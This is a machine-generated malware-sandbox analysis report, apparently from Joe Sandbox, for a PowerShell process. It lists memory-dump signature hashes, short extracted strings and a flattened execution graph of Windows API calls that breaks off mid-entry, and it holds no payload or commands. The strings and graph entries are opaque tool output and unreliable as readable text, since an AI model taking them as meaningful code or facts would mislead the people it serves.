                                                                                                    • String ID: (fgl$(fgl$(fgl$(fgl$x.Xk
                                                                                                    • API String ID: 0-1173585876
                                                                                                    • Opcode ID: b1371fe25d3b4cf9ebe29ab7b08ee9338dbe9ee7dc6676a9ef4088895a164dc8
                                                                                                    • Instruction ID: 4fe37313c1c4994c7058d12edb1c4df43fbe6cfc2e2268340e11eab0ef8a9744
                                                                                                    • Opcode Fuzzy Hash: b1371fe25d3b4cf9ebe29ab7b08ee9338dbe9ee7dc6676a9ef4088895a164dc8
                                                                                                    • Instruction Fuzzy Hash: 9DB185B0B10205DFE724DBA8C455BAABBE2AFC8704F248469D505AF791CB72EC41CF65
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: x.Xk$x.Xk$-Xk$-Xk
                                                                                                    • API String ID: 0-3777945611
                                                                                                    • Opcode ID: 60d0b5bfea6da386040001d2a23f9348a2500417f1a14f65a3b73708f5a13797
                                                                                                    • Instruction ID: 24436861463bf647ade1d4e96c1d712ad369f20b892c3233e582e5b43309378f
                                                                                                    • Opcode Fuzzy Hash: 60d0b5bfea6da386040001d2a23f9348a2500417f1a14f65a3b73708f5a13797
                                                                                                    • Instruction Fuzzy Hash: 62727FB0A10215DFE724DBA8C855B9EBBB2AF84704F10C4A9D9096F795CB72DC41CFA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2380259705.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_45d0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: h]Fj$h]Fj$h]Fj$IFj
                                                                                                    • API String ID: 0-765126014
                                                                                                    • Opcode ID: 39cfe022e2e16f8c5671aa7416e7acb57d72499ab57f49a98ce7627efb4ea97b
                                                                                                    • Instruction ID: 883751dc20cf2f85692904dfa4cfdcb1dd97544539ee981e2a91b9e9263531fc
                                                                                                    • Opcode Fuzzy Hash: 39cfe022e2e16f8c5671aa7416e7acb57d72499ab57f49a98ce7627efb4ea97b
                                                                                                    • Instruction Fuzzy Hash: 67125030B011188FDB25DF68D854BAEB7B2BF89705F1144A9D80AAB365CF35AD81DF81
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fgl$x.Xk$-Xk
                                                                                                    • API String ID: 0-3871031438
                                                                                                    • Opcode ID: 018f51b2713e91c62e76c4a430b2e3e1eaa8d40ec69485be61003a98085293b4
                                                                                                    • Instruction ID: 853d416060880343990b45defe0afdcb1f5c6d0a6f195e1ce734ec07a21a79b1
                                                                                                    • Opcode Fuzzy Hash: 018f51b2713e91c62e76c4a430b2e3e1eaa8d40ec69485be61003a98085293b4
                                                                                                    • Instruction Fuzzy Hash: 5902A2B4A10205DFE714DB58C854FAABBB2AF88714F14C499E9096F395CB72EC42CF91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fgl$(fgl$x.Xk
                                                                                                    • API String ID: 0-3753052516
                                                                                                    • Opcode ID: 20ab303ebf57edabf25438ecd5b2546682e962ca57edf2a10ac0f03dbed26d32
                                                                                                    • Instruction ID: 924498348a462d2dbe1c4b8299f3451e5bd45783299e7ccc117097c04ad1e2eb
                                                                                                    • Opcode Fuzzy Hash: 20ab303ebf57edabf25438ecd5b2546682e962ca57edf2a10ac0f03dbed26d32
                                                                                                    • Instruction Fuzzy Hash: F6A193F0A10205DFEB24DB64C454BAABBF2AF89710F248069E505AF791CB72EC41CF65
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 84el$84el
                                                                                                    • API String ID: 0-2867667415
                                                                                                    • Opcode ID: 79ea30eb95161754b6ce46f005581c4e42bb89861727d62d0e66bbd1a37d5734
                                                                                                    • Instruction ID: a159daa369c2918008c8189d2ba6d74320d489af7bedfcdf277b299514dd90fa
                                                                                                    • Opcode Fuzzy Hash: 79ea30eb95161754b6ce46f005581c4e42bb89861727d62d0e66bbd1a37d5734
                                                                                                    • Instruction Fuzzy Hash: 6E1218B1704346DFEB25DB79C81466ABBB5BF86210F14C0AFD449CB296DA31CC45CBA2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2380259705.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_45d0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: \VFj$\VFj
                                                                                                    • API String ID: 0-3111992299
                                                                                                    • Opcode ID: f7872f67d5d06697e0d355452d9eec923afa0675841591c044d52739e0c2e5fa
                                                                                                    • Instruction ID: 920a9e2afc8b4d1240c2dc210226e35d465ae0d0dfc1cd5e9b2d518371d3fd87
                                                                                                    • Opcode Fuzzy Hash: f7872f67d5d06697e0d355452d9eec923afa0675841591c044d52739e0c2e5fa
                                                                                                    • Instruction Fuzzy Hash: 26714972E002499FDF20CFADD88179EBBF2BF88714F148129E416A7254EB74A841DF95
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2380259705.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_45d0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: \VFj$\VFj
                                                                                                    • API String ID: 0-3111992299
                                                                                                    • Opcode ID: 5d38b2a9e43d7b0a8a6d50a318c048a85190b51927b7adcb02cd9d64b942960d
                                                                                                    • Instruction ID: acb6b4675eb1d23d35e9aa7db0b9bcf9ab9181bbb598e2d7c1d43b434a0727c6
                                                                                                    • Opcode Fuzzy Hash: 5d38b2a9e43d7b0a8a6d50a318c048a85190b51927b7adcb02cd9d64b942960d
                                                                                                    • Instruction Fuzzy Hash: 2B714971E00249DFDF20CFA9D88179EBBF2BF88714F148129E416AB254EB74A841DF95
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2380259705.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_45d0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: h]Fj$IFj
                                                                                                    • API String ID: 0-4105791047
                                                                                                    • Opcode ID: b08fdc108bb51275db98977e50c136c68f523a081df442131153aeb4ab8be321
                                                                                                    • Instruction ID: ec4f49595a72c05fc6689edd5c050daf972bf70edd33837bf11211c9bc250ad9
                                                                                                    • Opcode Fuzzy Hash: b08fdc108bb51275db98977e50c136c68f523a081df442131153aeb4ab8be321
                                                                                                    • Instruction Fuzzy Hash: 1B310F30B011188FCB26DB68C8546EEB7B2BF89305F1154E9D419AB351CF35AE41DF81
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fgl
                                                                                                    • API String ID: 0-1713389388
                                                                                                    • Opcode ID: 486fb9386ca0df155149ae98415ce176bfe4f030ea1d90d8dec7455d801938ae
                                                                                                    • Instruction ID: 2641f871b8ecd6a8746bb5800b3bd247e1867808bed96748e2703cf6497edad1
                                                                                                    • Opcode Fuzzy Hash: 486fb9386ca0df155149ae98415ce176bfe4f030ea1d90d8dec7455d801938ae
                                                                                                    • Instruction Fuzzy Hash: 0A226AB4B10215DFE724CB48C855BA9B7B2BB89704F64C099E909AB391CB72EC81CF51
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2380259705.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_45d0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: \VFj
                                                                                                    • API String ID: 0-3286916545
                                                                                                    • Opcode ID: 2183f4ec2cd382499a6013ecc153baafac268a7149d91d39998c74b1cc5ce0fc
                                                                                                    • Instruction ID: 8b0aa1562b704dcd3064200d8246684b0a5f7e7493cc1311abd4d8206d9d91cc
                                                                                                    • Opcode Fuzzy Hash: 2183f4ec2cd382499a6013ecc153baafac268a7149d91d39998c74b1cc5ce0fc
                                                                                                    • Instruction Fuzzy Hash: 4DB17E71E00619CFDB20CFACD88579EBBF1BF88704F148529E816AB254EB74A841DF81
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: x.Xk
                                                                                                    • API String ID: 0-354308873
                                                                                                    • Opcode ID: dbdc0b7f4a14ed44197975580e6a8dd57264e0c4c8e8f62bdc9f5ff729f0f590
                                                                                                    • Instruction ID: c6f82a4798636f87a5e5d5d5eaa6173e2c0fe148513dc24598431c3bab3fa751
                                                                                                    • Opcode Fuzzy Hash: dbdc0b7f4a14ed44197975580e6a8dd57264e0c4c8e8f62bdc9f5ff729f0f590
                                                                                                    • Instruction Fuzzy Hash: F631A770B50214EBF714A7B4C855BAF7AA3AFC4754F208429E9016F3D1CFB69C018BA5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 21a3c513d43bb6255b011193a52c7bbb7c84e2ea891f770e8b01e107343b26e5
                                                                                                    • Instruction ID: 1fc073200b4d23f9f39f51abde2c9c534da5c348af1d4dc933ac38608d590bc2
                                                                                                    • Opcode Fuzzy Hash: 21a3c513d43bb6255b011193a52c7bbb7c84e2ea891f770e8b01e107343b26e5
                                                                                                    • Instruction Fuzzy Hash: B5221BF1B04206CFE725DA69C8046FABBE6AFC5310F1480AED549CB652DB71DE41CBA1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 124db1fec6e4849c3ffc77a9a2dee67c48ba7ce2af3638e1b7c2aa9d858aebf5
                                                                                                    • Instruction ID: e43ae724826b1f45bae04f09082598b6d0962c2f8c5db58e6f38aecb3b82030d
                                                                                                    • Opcode Fuzzy Hash: 124db1fec6e4849c3ffc77a9a2dee67c48ba7ce2af3638e1b7c2aa9d858aebf5
                                                                                                    • Instruction Fuzzy Hash: 0D123AB1B0425ACFEB25DBB8841577A7BA2AFC1310F14C0AED549CB691DB71DC42CBA1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2380259705.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_45d0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 23783e5b410f7ed9b38ad2f5acd3d99f4b94080f349981d1a54f83cb85d440af
                                                                                                    • Instruction ID: 8eb0b81f9217679c0a659cfdbbbe13bdd30919d98a33374e0ee318eb62f5a040
                                                                                                    • Opcode Fuzzy Hash: 23783e5b410f7ed9b38ad2f5acd3d99f4b94080f349981d1a54f83cb85d440af
                                                                                                    • Instruction Fuzzy Hash: 1FD13D74A00218EFDB14DF98D484A9DFBB2FF49310F248659E819AB361D771ED82DB90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2380259705.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_45d0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_45d0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 081a12fdb9b576bdcdb62d29ab3e3020b460f5a684fa757e277ea9ef3ce6c658
                                                                                                    • Instruction ID: 4c0b819efb1f037e96aeaa53ea978e19485b7063c4ffee31cffb03a64457a672
                                                                                                    • Opcode Fuzzy Hash: 081a12fdb9b576bdcdb62d29ab3e3020b460f5a684fa757e277ea9ef3ce6c658
                                                                                                    • Instruction Fuzzy Hash: F8210774A00609DFCB14CF9DD5809AAFBB1FF88310B248559E909AB711C731FC81CBA1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c0c9fb7d139caa05a8c2a36bf81ff1da1619d2cf58583402e0330fd3e2cf2499
                                                                                                    • Instruction ID: eedf3240ef592a715e1f5cae250ab295129c6df6074818e5072469369ebaea77
                                                                                                    • Opcode Fuzzy Hash: c0c9fb7d139caa05a8c2a36bf81ff1da1619d2cf58583402e0330fd3e2cf2499
                                                                                                    • Instruction Fuzzy Hash: 5301477630025ACBE72899AAD80057AB799DFC1222F14C03FD58DCF651DA32DC05C3A0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2380259705.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_45d0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3799145f52cd04205f4c09a0cc3b576d94a50bc6c64a2545e45ff636f600283b
                                                                                                    • Instruction ID: 9123d3fa94ffbf1aee4e4e14d066b896f7a3700419d86d806261b6622fb9c2f3
                                                                                                    • Opcode Fuzzy Hash: 3799145f52cd04205f4c09a0cc3b576d94a50bc6c64a2545e45ff636f600283b
                                                                                                    • Instruction Fuzzy Hash: AE118631D01599DBEF34DAD8E9987ECB771BF4931EF141429C002B6190EB7468CADB15
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2379838904.000000000443D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0443D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_443d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b498493113b0ba1d9a923fd088b032f2aedad31eba73300f033e8bb71b58c4a4
                                                                                                    • Instruction ID: 2c27831bff48abc9367954fc8f0d0c9a04038972ea0963f9b7e055e119e7a3f9
                                                                                                    • Opcode Fuzzy Hash: b498493113b0ba1d9a923fd088b032f2aedad31eba73300f033e8bb71b58c4a4
                                                                                                    • Instruction Fuzzy Hash: 6D019E6240E3C09FE7128B25DD94B52BFB4DF43628F0880DBD9888F2A3C2685849C772
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2379838904.000000000443D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0443D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_443d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b09c33f14f2fb4d7ccd7b67d5fa4ede14f3201534042b4749880e28fac707c4d
                                                                                                    • Instruction ID: 8c4459a689ba6e261ae9c7b460552fd6d531f0d8294550af9a31fc5eb9a931a3
                                                                                                    • Opcode Fuzzy Hash: b09c33f14f2fb4d7ccd7b67d5fa4ede14f3201534042b4749880e28fac707c4d
                                                                                                    • Instruction Fuzzy Hash: 6D0120B1905340DAFB204F25ED80757BFA8DF45F69F18C01BDD041B242C678A442C6B1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5c3885a44568b6dbf8f0e3bc2ec4c7cc4f95832ff2cf8fc41d60666768c86a88
                                                                                                    • Instruction ID: 456746b7242519c76a30deff7bb2d07208c826fcc45de537737ca230996e9578
                                                                                                    • Opcode Fuzzy Hash: 5c3885a44568b6dbf8f0e3bc2ec4c7cc4f95832ff2cf8fc41d60666768c86a88
                                                                                                    • Instruction Fuzzy Hash: F9F0A9B520A2C18FE312CB54C890A54BF71AF83205B0DC0CAD0588F1A3CB269C47DB43
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c9e23d3b73780f521df1d3f3997c5e842158dc756d2fc96b1377b068ff4e9853
                                                                                                    • Instruction ID: b6ddceeea61fe00c972cb4ffb5ccddfcebd9192c19e61deda98fdab7e4bcf5a5
                                                                                                    • Opcode Fuzzy Hash: c9e23d3b73780f521df1d3f3997c5e842158dc756d2fc96b1377b068ff4e9853
                                                                                                    • Instruction Fuzzy Hash: F8F0C9B050A2869FE716DB58C858A14BB72AF52245F1DC0DBC0888F1A7C7379D56CB52
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2379838904.000000000443D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0443D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_443d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9e623fc6519ae0bd6ab61453e73ee70350285b3870d6fcbf2b2b1365935d2f7a
                                                                                                    • Instruction ID: 27c392655584c047d042520aa5df7d015c04fa9e1b0ddccd6e6e99a998ec64cf
                                                                                                    • Opcode Fuzzy Hash: 9e623fc6519ae0bd6ab61453e73ee70350285b3870d6fcbf2b2b1365935d2f7a
                                                                                                    • Instruction Fuzzy Hash: C92106B6A04244DFDF14DF10D9C0B27BF65FB88725F24856AD9090A256C336E456CBA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fgl$(fgl$(fgl$(fgl$x.Xk$-Xk
                                                                                                    • API String ID: 0-2721235675
                                                                                                    • Opcode ID: 396c72a3af43b077f9634ff2863e791a4e67c7495abd00ff3c655750d885dffc
                                                                                                    • Instruction ID: a3bd5665434fc7d01f3b7692dd71656cdd2d796658a9e8bb62360b483db598f7
                                                                                                    • Opcode Fuzzy Hash: 396c72a3af43b077f9634ff2863e791a4e67c7495abd00ff3c655750d885dffc
                                                                                                    • Instruction Fuzzy Hash: 85E1D1B0A40205DBEB24DBA4C401B6EBBB2AFC8714F14842DD5056F795CF76EC428FA2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ]l$]l$]l$]l
                                                                                                    • API String ID: 0-3989967336
                                                                                                    • Opcode ID: d16879ca7e2ea6ccfd6f38f65e1f2bb1704df9c2297d6ad2e0219d97999b38ef
                                                                                                    • Instruction ID: f0d38fbe3039d06bdd9155303d30562c9e11cf10ca70238031c7183632fd1a58
                                                                                                    • Opcode Fuzzy Hash: d16879ca7e2ea6ccfd6f38f65e1f2bb1704df9c2297d6ad2e0219d97999b38ef
                                                                                                    • Instruction Fuzzy Hash: 69F148B2B042168FEB25CB78C80436ABBE5AFC5310F15C06ED449CB651DB72EC41CBA2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fgl$(fgl$x.Xk$-Xk
                                                                                                    • API String ID: 0-3576838702
                                                                                                    • Opcode ID: 048fe52f3c62945897fd19b13ac83e1a3ea405730618d54c3cc091419043aa6a
                                                                                                    • Instruction ID: 3524de9d01316b427e92c1622c904cd58fba120724cea411f1c5f7928f075ed7
                                                                                                    • Opcode Fuzzy Hash: 048fe52f3c62945897fd19b13ac83e1a3ea405730618d54c3cc091419043aa6a
                                                                                                    • Instruction Fuzzy Hash: 8EC1B1F0A40306DFEB24DBA4C441BAEBBB2AF88714F14855DD4096B755CB76AC42CF91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fgl$(fgl$(fgl$(fgl
                                                                                                    • API String ID: 0-2919359546
                                                                                                    • Opcode ID: 017549d5498c89984cd1721f0a2598e0b5403303dabbb91cfebd971b3794d633
                                                                                                    • Instruction ID: 30da69374e19a33be15d978958190dbddf19c218803dae9e940a9a57a35317c3
                                                                                                    • Opcode Fuzzy Hash: 017549d5498c89984cd1721f0a2598e0b5403303dabbb91cfebd971b3794d633
                                                                                                    • Instruction Fuzzy Hash: E37193B4A00205DFE724CF98C444AAEBBF2AF84715F14906DD4099B751CB32ED41CF95
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fgl$(fgl$4dl$tLYk
                                                                                                    • API String ID: 0-562721780
                                                                                                    • Opcode ID: 415a65bc9d2ee1b83b8d1aa14c869e0ecfcedd330622f075f6accfbebd1bc4ab
                                                                                                    • Instruction ID: 53088cca7511168864daef11972c65a014951252fe40854c42235d614b2b85e2
                                                                                                    • Opcode Fuzzy Hash: 415a65bc9d2ee1b83b8d1aa14c869e0ecfcedd330622f075f6accfbebd1bc4ab
                                                                                                    • Instruction Fuzzy Hash: 4051AEF0A50201DBEB24DF58C444A6ABBF2AF89714F18C86DE509AB751DB32EC41CF95

Execution Graph

Execution Coverage: 1.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 2.7%
Total number of Nodes: 1658
Total number of Limit Nodes: 1
execution_graph: flattened node/edge listing of the rendered call graph (node ids in the 21bd4xxx-21bdbxxx range of the PowerShell process, with calls into _abort, _free, ___scrt_fastfail, _ValidateLocalCookies, TlsAlloc/TlsFree, IsDebuggerPresent, SetUnhandledExceptionFilter, RaiseException, FindFirstFileExA, RtlAllocateHeap/RtlReAllocateHeap/RtlSizeHeap, InitializeCriticalSectionAndSpinCount, RtlDeleteCriticalSection and GetCurrentProcess/TerminateProcess); the edge list itself is not reproduced here
RtlDeleteCriticalSection 7222->7223 7223->7221 7223->7223 7329 21bd3370 7340 21bd3330 7329->7340 7341 21bd334f 7340->7341 7342 21bd3342 7340->7342 7343 21bd2ada _ValidateLocalCookies 5 API calls 7342->7343 7343->7341 6102 21bd3eb3 6105 21bd5411 6102->6105 6106 21bd541d _abort 6105->6106 6111 21bd5af6 GetLastError 6106->6111 6110 21bd5422 6131 21bd55a8 6110->6131 6112 21bd5b0c 6111->6112 6113 21bd5b12 6111->6113 6114 21bd5e08 _abort 11 API calls 6112->6114 6115 21bd637b _abort 20 API calls 6113->6115 6117 21bd5b61 SetLastError 6113->6117 6114->6113 6116 21bd5b24 6115->6116 6118 21bd5e5e _abort 11 API calls 6116->6118 6123 21bd5b2c 6116->6123 6117->6110 6120 21bd5b41 6118->6120 6119 21bd571e _free 20 API calls 6121 21bd5b32 6119->6121 6122 21bd5b48 6120->6122 6120->6123 6124 21bd5b6d SetLastError 6121->6124 6125 21bd593c _abort 20 API calls 6122->6125 6123->6119 6127 21bd55a8 _abort 35 API calls 6124->6127 6126 21bd5b53 6125->6126 6129 21bd571e _free 20 API calls 6126->6129 6128 21bd5b79 6127->6128 6130 21bd5b5a 6129->6130 6130->6117 6130->6124 6142 21bd7613 6131->6142 6134 21bd55b8 6136 21bd55e0 6134->6136 6137 21bd55c2 IsProcessorFeaturePresent 6134->6137 6172 21bd4bc1 6136->6172 6138 21bd55cd 6137->6138 6141 21bd60e2 _abort 8 API calls 6138->6141 6141->6136 6175 21bd7581 6142->6175 6145 21bd766e 6146 21bd767a _abort 6145->6146 6147 21bd5b7a _abort 20 API calls 6146->6147 6148 21bd76a1 _abort 6146->6148 6152 21bd76a7 _abort 6146->6152 6147->6148 6149 21bd76f3 6148->6149 6148->6152 6156 21bd76d6 6148->6156 6150 21bd6368 _free 20 API calls 6149->6150 6151 21bd76f8 6150->6151 6153 21bd62ac _abort 26 API calls 6151->6153 6154 21bd771f 6152->6154 6189 21bd5671 RtlEnterCriticalSection 6152->6189 6153->6156 6159 21bd777e 6154->6159 6161 21bd7776 6154->6161 6169 21bd77a9 6154->6169 6190 21bd56b9 RtlLeaveCriticalSection 6154->6190 6198 21bdbdc9 6156->6198 6159->6169 6191 21bd7665 6159->6191 6164 21bd4bc1 _abort 28 API calls 6161->6164 6164->6159 6166 21bd5af6 _abort 38 API 
